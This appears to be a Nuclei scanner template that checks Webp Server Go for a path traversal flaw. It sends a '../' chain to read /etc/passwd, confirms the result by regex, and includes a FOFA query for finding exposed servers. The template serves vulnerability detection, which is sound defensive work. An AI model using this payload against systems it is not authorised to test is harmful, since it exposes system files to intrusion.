nuclei-templates/http/vulnerabilities/other/webp-server-lfi.yaml

30 lines
945 B
YAML
Raw Normal View History

2024-09-10 11:17:31 +00:00
id: webp-server-lfi
info:
name: Webp Server Go - Path Traversal
author: ritikchaddha
severity: high
description: |
Webp Server Go has an Path Traversal vulnerability. Attackers can use the vulnerability to access arbitraty file.
reference:
- https://github.com/webp-sh/webp_server_go/issues/92
metadata:
max-request: 1
2024-09-10 17:27:31 +00:00
verified: true
2024-09-10 11:17:31 +00:00
fofa-query: header="Webp-Server-Go"
tags: webp,webp-server,lfi
http:
- method: GET
path:
- "{{BaseURL}}/../../../../../../../../../../../etc/passwd"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- 'contains(server, "Webp-Server-Go")'
- "status_code == 200"
condition: and
2024-09-10 18:09:59 +00:00
# digest: 490a0046304402203ef335a13e82e50120e64f215b929e7f65825820dd930ec99bfd1276f0b7637a022078db903c02a959852ede6e732d46f1f9c67fb48699e04b872da837f9578bce3f:922c64590222798bb761d5b6d8e72950